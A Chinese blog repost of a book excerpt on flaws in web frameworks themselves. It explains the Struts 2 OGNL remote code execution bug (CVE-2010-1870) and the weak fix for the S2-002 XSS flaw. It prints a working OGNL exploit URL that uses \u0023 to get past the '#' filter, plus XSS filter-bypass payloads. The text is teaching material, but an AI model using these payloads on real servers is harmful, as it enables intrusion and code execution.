Web框架自身安全

最新推荐文章于 2024-08-16 23:08:28 发布
最新推荐文章于 2024-08-16 23:08:28 发布
阅读量90 收藏
点赞数
文章标签: java web安全

Web框架自身安全

下面讲到的几个漏洞,都是一些流行的Web开发框架曾经出现过的严重漏洞。研究这些案例,可以帮助我们更好地理解框架安全,在使用开发框架时更加的小心,同时让我们不要迷信于开发框架的权威。

Struts 2命令执行漏洞

201079日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。

这个漏洞的细节描述公布在exploit-db[1]上。

在这里简单摘述如下:

XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object GraphNavigation Language)的。OGNL是怎么处理的呢?如下:

user.address.city=Bishkek&user['favoriteDrink']=kumys

会被转化成:

action.getUser().getAddress().setCity("Bishkek")

action.getUser().setFavoriteDrink("kumys")

这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。

* Method calling: foo()

* Static method calling: @java.lang.System@exit(1)

* Constructor calling: new MyClass()

* Ability to work with context variables: #foo = new MyClass()

* And more...

由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。

* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution'(缺省为true)

* SecurityMemberAccess private field called'allowStaticMethodAccess' (缺省为false)

但这两个方法可以被覆盖,从而导致代码执行。

#_memberAccess['allowStaticMethodAccess'] = true

#foo = new java .lang.Boolean("false")

#context['xwork.MethodAccessor.denyMethodExecution']= #foo

#rt = @java.lang.Runtime@getRuntime()

#rt.exec('mkdir /tmp/PWNED')

ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。

* #context - OgnlContext, the one guarding method execution based on'xwork.MethodAccessor. denyMethodExecution' property value.

* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess'field prevented static method execution.

* #root

* #this

* #_typeResolver

* #_classResolver

* #_traceEvaluations

* #_lastEvaluation

* #_keepLastEvaluation

可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload

http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den

yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti

me()))=1

最终导致代码执行成功。

Struts 2的问题补丁

Struts 2官方目前公布了几个安全补丁[2]

Struts 2官方的补丁页面

但深入其细节不难发现,补丁提交者对于安全的理解是非常粗浅的。以S2-002的漏洞修补为例,这是一个XSS漏洞,发现者当时提交给官方的POC只是构造了script标签。

http://localhost/foo/bar.action?<script>alert(1)</script>test=hello

我们看看当时官方是如何修补的:

新增的修补代码:

可以看到,只是简单地替换掉<script> 标签。

于是有人发现,如果构造 <<script>>,经过一次处理后会变为 <script>。漏洞报告给官方后,开发者再次提交了一个补丁,这次将递归处理类似<<<<script>>>>的情况。

修补代码仅仅是将if变成while

这种漏洞修补方式,仍然是存在问题的,攻击者可以通过下面的方法绕过:

http://localhost/foo/bar.action?<script test=hello>alert(1)</script>

由此可见,Struts 2的开发者,本身对于安全的理解是非常不到位的。

本文节选自《白帽子讲Web安全》一书。

图书详细信息:http://blog.csdn.net/broadview2006/article/details/7441491


[1] http://www.exploit-db.com/exploits/14360/

[2] http://struts.apache.org/2.x/docs/security-bulletins.html

iteye_4515
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《白帽子讲Web安全》12-Web框架安全
CD的博客
03-30 1020
总的来说,实施安全方案,要达到好的效果,必须要完成两个目标: - 安全方案正确、可靠 - 能够发现所有可能存在的安全问题,不出现遗漏12.1 MVC框架安全
Web框架安全漏洞的测试反思
weixin_34297704的博客
10-18 236
此文已由作者王婷英授权网易云社区发布。欢迎访问网易云社区,了解更多网易技术产品运营经验。在平时的测试中,一般情况下,我们都是比较关注功能业务测试,以及对应的接口测试,很少去关注对应的业务设计上存在的安全漏洞测试分析。随着行业对安全的要求越来越高,同时我们电商是经常在网络上发生交易操作的网站,更是要关注安全测试相关的测试场景的考虑。之所以来编写这篇web的里的安全测试的文章,主要是在平时的测试过程中...
Web框架安全
weixin_40270125的博客
02-01 355
模板引擎与XSS防御 XSS攻击是在用户的浏览器上执行的,其形成过程则是在服务器端页面渲染时,注入了恶意的HTML代码导致的。从MVC架构来说,是发生在View层,因此使用“输出编码”的防御方法更加合理,这意味着需要针对不同上下文的XSS攻击场景,使用不同的编码方式。 “输出编码”的防御方法有以下几种: 在HTML标签中输出变量 在HTML属性中输出变量 在script标签中输出变量 ...
web框架安全概览--你所使用的web框架是否安全
qq_43571759的博客
05-12 716
web框架安全安全–>安全框架–>框架安全–>不安全 文章目录web框架安全MVC框架实现安全方案模板引擎与XSS防御web框架与CSRF防御HTTP Headers管理数据持久层与SQL注入web框架自身安全struts2命令执行漏洞spring MVC命令执行Django命令执行漏洞shiro反序列化漏洞thinkphp命令执行 MVC框架实现安全方案 mvc框架web应用分为三层即 view层----负责用户试图、页面暂时等 controller层----负责应用的逻辑是西安,
Web系统安全漏洞(JAVA
chenfei2744的博客
04-07 1202
Web系统安全漏洞引言1.代码注入(1)命令注入下面我举个栗子:功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 引言 ...
14款NodeJS Web框架推荐
10-25
根据提供的文件内容,我们将详细介绍其中提到的14款基于Node.js的Web框架,它们在帮助开发者构建高效Web应用方面各有特色。 1. Primus:Primus框架是Transformer的创造者,提供了通用的低级别接口用于各个实时框架...
Web安全测试全解.zip
03-12
【描述】"Web安全测试全解.png"可能是一张图片,提供了Web安全测试的整体框架或者关键概念的可视化展示。这张图片可能包括了测试流程、常用工具、常见的安全威胁以及应对策略等内容。 【标签】"Web安全测试全解"和...
白帽子讲WEB安全
07-17
白帽子,即道德黑客,他们通过合法授权的渗透测试来发现并修复系统的安全漏洞,保障用户的个人信息和企业数据安全。 本书可能涵盖以下几个关键知识点: 1. **Web安全基础**:首先,书中会介绍Web应用的基本架构,...
WEB考试系统框架.rar
05-24
这个框架提供了创建、管理及执行在线考试的功能,适用于教育机构、企业内部培训或者个人学习者自我测试。 【描述】"WEB考试系统框架源码"意味着这个压缩包包含了该系统的核心代码,开发人员可以通过查看和分析这些...
白帽子讲web安全
03-04
《白帽子讲Web安全》是由吴翰...通过阅读这本书,读者可以了解到Web安全的核心概念,了解各种常见的安全攻击手段,学习如何保护自己的数据安全和个人隐私,以及如何在实际工作中应用安全策略和技术来提升系统的安全性。
常见web安全漏洞修复方案(全面)
Websec
03-04 1万+
第一章 SQL注入漏洞 第一节 漏洞介绍 概述:SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从 数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作 (如关闭数据库管理系统)、恢 复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。 它将SQL命令注入到数据层输...
常见Web漏洞的修复建议手册
Websec
11-24 3075
漏洞类型 修复建议 明文传输 1、需要对密码字段进行md5+salt(aes/rsa等不可逆算法)加密 用户名枚举 1、建议对接口登录页面的判断回显信息修改为一致:用户名或密码错误(模糊提示)。 用户名暴力破解 1、账户锁定 账户锁定是很有效的方法,因为暴力破解程序在5-6次的探测中猜出密码的可能性很小。但是同时也拒绝了正常用户的使用。如果攻击者的探测是建立在用户名探测成功之后的行为,那么会造成严重的拒绝服务攻击。对于对大量用户名只用一个密码的探测攻击账户锁定无效。
详解Javaweb中常见漏洞的防御
nextdoor6的博客
07-20 5352
上一篇给大家介绍了SpringMVC中常见的客户端数据输入点,这一篇给大家讲解下java中常见漏洞的防御方法。 0x01.sql注入 下面我们就用利用SpringMVC自带的数据库操作类jdbcTemplate举例。不如下面Dao中有如下的两个函数。 函数一save使用的是绑定变量的形式很好的防止了sql注入,而queryForInt_函数接收id参数直接进行了拼接,测试时出现sql
渗透测试之框架漏洞
Blood_Pupil的博客
05-21 1908
PHP ThinkPHP Getshell SQli
Web安全—漏洞整体框架(持续更新)
weixin_44431280的博客
12-07 469
提要:此篇文章主要总结Web安全学习中需要学习的Web漏洞及掌握漏洞需要必备的基础知识,整体会作为后续学习的提纲。 Web漏洞分为两类:客户端和服务端漏洞。 客户端漏洞: CSRF(跨站请求伪造): SSRF: XSS(跨站脚本攻击) 服务端漏洞: SQL注入: 原理:前端提交的参数值是恶意SQL语句,后端未进行过滤,被代入后端SQL语句中查询,并在数据库中执行。前后端未对参数值进行限制。 目录遍历: 文件读取: 命令执行: XXE安全: 文件上传 原理:文件上传位置对上传的文件类型未进行过滤或过滤不严。
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
web渗透--9--识别web应用框架
武天旭的博客
09-11 4361
1、概述 Web框架指纹识别是信息收集过程中的一个重要任务。获悉目标框架的类型必然为测试人员带来极大的优势,如果该框架在之前就被测试过。测试人员不仅可以获得未修补版本中存在的漏洞,还可以了解此框架中特有的错误配置以及已知的文件结构。从而使指纹识别过程显得格外重要。
JAVA进阶补充
2301_80150315的博客
08-15 1014
概念:把已经有的方法拿过来用,当作函数式接口中抽象方法的方法体条件:引用处必须是函数式接口被引用的方法需要已经存在被引用方法的形参和返回值需要跟抽象方法的形参和返回值保持一致被引用方法的功能需要满足当前需求:方法引用符意义:就是为让控制台的报错信息更加的见名知意自定义异常的步骤:定义异常类写继承关系空参构造带参构造​file对象就表示一个路径,可以是文件的路径、也可以是文件夹的路径;这个路径可以是存在的,也允许是不存在的构造方法描述根据文件路径创建对象。
手撕快排——三种实现方法(附动图及源码)
最新发布
jsjs1346的博客
08-16 899
🤖💻👨‍💻👩‍💻🌟🚀🤖🌟👨‍💻👩‍💻👨‍💻👩‍💻🚀是一种高效的排序算法,广泛应用于各种场景。它采用策略,将一个数组分成两个子数组,然后递归地对这两个子数组进行排序。本文将介绍三种快速排序的实现方法,并附上相应的源码。⚙️一、快速排序的基本原理一个基准元素(pivot)分成两个子数组递归合并O(n log n)O(n log n)O(n^2)后文我们将给出优化方案O(log n)📚三、实现霍尔方法是快速排序原始版本中使用的分区方法。
Web框架安全实践:dbc文件解析与防护策略
描述中还提到了Web框架自身的安全性。由于许多网站不会频繁升级基础架构,框架的漏洞可能得不到及时修复,从而造成严重后果。因此,框架开发者需要确保其代码的质量和安全性,减少潜在的bug。 《白帽子讲Web安全》...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值